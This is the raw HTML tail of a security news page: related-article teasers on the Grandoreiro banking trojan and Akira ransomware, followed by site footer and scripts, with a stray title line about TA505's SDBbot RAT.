</amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <div class="article__eyebrow"> <span class="article__date"> May 16, 2024 </span> </div>  <a href="https://securityintelligence.com/x-force/grandoreiro-banking-trojan-unleashed/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 16</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Since March 2024, IBM X-Force has been tracking several large-scale phishing campaigns distributing the Grandoreiro banking trojan, which is likely operated as a Malware-as-a-Service (MaaS). Analysis of the malware revealed major updates within the string decryption and domain generating algorithm (DGA), as well as the ability to use Microsoft Outlook clients on infected hosts to spread further phishing emails. The latest malware variant also specifically targets over 1500 global banks, enabling attackers to perform banking fraud in over 60 countries… </p> </div> </a> </div> </article> <article class="article article--card cards__article_grid ">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/spotlight-akira-ransomware-x-force/"> <div class="article__img"> <amp-img alt="A diverse group of professionals gathered around a desk looking at multiple computer monitors" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/05/Team-of-traders-working-at-monitor-computer-and-browsing-online-in-trading-office-2-630x330.jpeg.webp"> <amp-img fallback alt="A diverse group of professionals gathered around a desk looking at multiple computer monitors" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/05/Team-of-traders-working-at-monitor-computer-and-browsing-online-in-trading-office-2-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <div class="article__eyebrow"> <span class="article__date"> May 2, 2024 </span> </div>  <a href="https://securityintelligence.com/x-force/spotlight-akira-ransomware-x-force/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> A spotlight on Akira ransomware from X-Force Incident Response and Threat Intelligence </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 7</span> <span class="rt-label rt-postfix">min read</span></span> - </span>This article was made possible thanks to contributions from Aaron Gdanski.IBM X-Force Incident Response and Threat Intelligence teams have investigated several Akira ransomware attacks since this threat actor group emerged in March 2023. This blog will share X-Force鈥檚 unique perspective on Akira gained while observing the threat actors behind this ransomware, including commands used to deploy the ransomware, active exploitation of CVE-2023-20269 and analysis of the ransomware binary.The Akira ransomware group has gained notoriety in the current cybersecurity landscape, underscored… </p> </div> </a> </div> </article> </div> </section> </div>  <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.31.0-rc.0/cta-section.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/cta-section.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/cta-section.min.js"></script> <div style="background-color: #161616;"> <dds-cta-section data-autoid="dds--cta-section" children-custom-class="" class="container SI_padding"> <dds-cta-block no-border="" data-autoid="dds--cta-block"> <dds-content-block-heading class="copy" role="heading" aria-level="2" data-autoid="dds--content-block__heading" slot="heading"> <h2 >Topic updates</h2> </dds-content-block-heading> <dds-content-block-copy data-autoid="dds--content-block__copy" size="md" slot="copy"> <dds-content-block-paragraph data-autoid="dds--content-block-paragraph" class="copy"> Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research. </dds-content-block-paragraph> <div role="list" class="list_newletter"> <dds-button-cta data-autoid="dds-cta" cta-style="button" class="copy" cta-type="local" href="https://www.ibm.com/account/reg/us-en/signup?formid=news-urx-51966" kind="primary" icon-layout="" size=""> Subscribe today </dds-button-cta> </div> </dds-content-block-copy> </dds-cta-block> </dds-cta-section> </div> <dds-footer-container></dds-footer-container> <script> document.addEventListener('DOMContentLoaded', () => { const boxstyle = document.querySelector('.button2'); const removePadding = document.querySelector('dds-cta-section'); if (boxstyle) { const shadowRoot = boxstyle.shadowRoot; const bxContentSsectionDOM = shadowRoot.querySelector('.bx--btn'); if (bxContentSsectionDOM) { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.addEventListener('mouseover', () => { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.style.backgroundColor = 'rgba(141, 141, 141, 0.16)'; // }); // when mouse leave the element bxContentSsectionDOM.addEventListener('mouseout', () => { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.style.backgroundColor = 'transparent'; // Reset background color }); } } if(removePadding){ const shadowRoot = removePadding.shadowRoot; const removespace = shadowRoot.querySelector('.bx--content-section__leading'); if(removespace){ removespace.style.display = 'none'; } } }); document.querySelector("dds-footer-container").size = 'default'; //Uncomment this to add a custom links. // document.querySelector("dds-footer-container").adjunctLinks = [{ // 'title': 'IBM Custom Link', // 'link': 'https://ibm.com' // }, // { // 'title': 'IBM Custom Link2', // 'link': 'https://ibm.com' // } // ]; </script>  <div style="background-color: #13171a;"> <div class="container">  <section id="footer" class="footer">  <div class="footer__logo"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence"></amp-img> </div>  <div class="footer__copy"><p>Analysis and insights from hundreds of the brightest minds in the cybersecurity industry to help you prove compliance, grow business and stop threats.</p> </div>  <div class="footer__list"> <a href="/news/" class="footer__link">Cybersecurity News</a> <a href="/category/topics/" class="footer__link">By Topic</a> <a href="/category/industries/" class="footer__link">By Industry</a> <a href="/series/" class="footer__link">Exclusive Series</a> <a href="/x-force/" class="footer__link">X-Force</a> <a href="/media/" class="footer__link">Podcast</a> <a href="/events/" class="footer__link">Events</a> <a href="/about-us/" class="footer__link">Contact</a> <a href="/about-us/" class="footer__link">About Us</a> </div>  <div class="footer__social-networks"> <div class="headline">Follow us on social</div> <a href="http://www.twitter.com/ibmsecurity" aria-label="Twitter" class="footer__icon" style="left:-4px;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z" /> </svg> </a> <a href="http://www.linkedin.com/company/ibm-security" aria-label="LinkedIn" class="footer__icon" style="justify-self: center;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M4.98 3.5c0 1.381-1.11 2.5-2.48 2.5s-2.48-1.119-2.48-2.5c0-1.38 1.11-2.5 2.48-2.5s2.48 1.12 2.48 2.5zm.02 4.5h-5v16h5v-16zm7.982 0h-4.968v16h4.969v-8.399c0-4.67 6.029-5.052 6.029 0v8.399h4.988v-10.131c0-7.88-8.922-7.593-11.018-3.714v-2.155z" /> </svg> </a> <a href="https://www.youtube.com/@IBMTechnology" aria-label="YouTube" class="footer__icon" style="justify-self: end;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M19.615 3.184c-3.604-.246-11.631-.245-15.23 0-3.897.266-4.356 2.62-4.385 8.816.029 6.185.484 8.549 4.385 8.816 3.6.245 11.626.246 15.23 0 3.897-.266 4.356-2.62 4.385-8.816-.029-6.185-.484-8.549-4.385-8.816zm-10.615 12.816v-8l8 3.993-8 4.007z" /> </svg> </a> </div> </section> </div> </div> <div style="background-color:black"> <div class="container">  <section class="utility_bar">  <div class="utility_bar__links" aria-label="Footer Navigation"> <a href="http://www.ibm.com?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">漏 2025 IBM</a> <a href="https://www.ibm.com/contact/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Contact</a> <a href="https://www.ibm.com/privacy/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Privacy</a> <a href="https://www.ibm.com/legal/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US&cm_mc_uid=03001744655915532865554&cm_mc_sid_50200000=84159441565120380187" target="_blank" rel="noopener, noreferrer">Terms of use</a> <a href="https://www.ibm.com/accessibility/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Accessibility</a> <a href="#" onclick="truste.eu.clickListener();return false;" target="_blank" rel="noopener, noreferrer">Cookie Preferences</a> </div>  <div class="utility_bar__sponsor"> <a href="http://ibm.com/security?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" data-icon="B" class="icon ibm" rel="noopener, noreferrer" style="padding-right:0px"> <span>Sponsored by <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 31.97 14.06"> <defs> <style> .cls-1 { fill: #fff; } </style> </defs> <title>si-icon-eightbarfeature</title> <path class="cls-1" d="M27.17,12.6h4.21v.84H27.17Zm0-1.68h4.21v.84H27.17Zm0-1.68h2.52v.84H27.17Zm0-1.69h2.52V8.4H27.17Zm0-1.68h2.52v.84H27.17Zm-.84-4.2.28-.85h4.77v.85Zm-.56,1.68.29-.84h5.32v.84ZM25.22,5l.28-.84h4.19V5Zm-.56,1.68L25,5.87h2.22l-.27.84Zm0,6.73-.28-.84H25Zm-.55-1.68-.29-.84H25.5l-.28.84Zm-.56-1.68-.27-.84H26l-.27.84ZM23,8.4l-.29-.85h3.9l-.28.85Zm-.57-1.69-.27-.84h2.22l.28.84Zm-2.8,2.53h2.53v.84H19.63Zm0-1.69h2.53V8.4H19.63Zm0-1.68h2.53v.84H19.63Zm0-.84V4.19h4.19l.29.84ZM18,12.6h4.21v.84H18Zm0-1.68h4.21v.84H18Zm0-7.57V2.51h5.32l.28.84Zm0-1.68V.82h4.76l.29.85ZM14.16,9.24H17a2.23,2.23,0,0,1,.07.37,2.49,2.49,0,0,1,0,.47H14.16Zm0-5h2.95a2.38,2.38,0,0,1,0,.46A2.18,2.18,0,0,1,17,5H14.16ZM9.11,9.24h2.52v.84H9.11Zm0-1.69H16a5,5,0,0,1,.4.4,2,2,0,0,1,.32.45H9.11Zm0-1.68h7.57a2,2,0,0,1-.32.45,4.89,4.89,0,0,1-.4.39H9.11Zm0-1.68h2.52V5H9.11ZM7.42,12.6H16a3.09,3.09,0,0,1-1,.62,3.73,3.73,0,0,1-1.32.22H7.42Zm0-1.68H17a2.47,2.47,0,0,1-.15.46,2.24,2.24,0,0,1-.21.38H7.42Zm0-8.41h9.22a1.91,1.91,0,0,1,.21.38,2.47,2.47,0,0,1,.15.46H7.42Zm0-1.69H13.6a3.73,3.73,0,0,1,1.32.23,3.09,3.09,0,0,1,1,.62H7.42Zm-5,8.42H4.9v.84H2.38Zm0-1.69H4.9V8.4H2.38Zm0-1.68H4.9v.84H2.38Zm0-1.68H4.9V5H2.38ZM.69,12.6H6.58v.84H.69Zm0-1.68H6.58v.84H.69Zm0-8.41H6.58v.84H.69ZM.69.82H6.58v.85H.69Z" /> </svg> </span> </a> </div> </section> </div> </div> <script> </script>  <script type="text/javascript" id="qppr_frontend_scripts-js-extra"> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/securityintelligence.com\/defining-security-intelligence\/":[0,0,"https:\/\/securityintelligence.com\/defintion-security-intelligence\/#.VS_NwpNnuZA"],"https:\/\/securityintelligence.com\/security-vulnerability-management-its-about-outcomes-not-activity\/":[0,0,""]},"siteURL":"https:\/\/securityintelligence.com","siteURLq":"https:\/\/securityintelligence.com"}; /* ]]> */ </script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4" id="qppr_frontend_scripts-js"></script> <script> setTimeout(() => { document.querySelector(".related_content").style.visibility = 'visible'; document.querySelector(".related_content.article.article_grid.article__mobile--card.article--IBM_blog > c4d-card > c4d-card-footer").shadowRoot.querySelector("#link").style.justifyContent = 'flex-start'; }, 100); </script> </body> </html>

CINXE.COM

TA505 Continues to Infect Networks With SDBbot RAT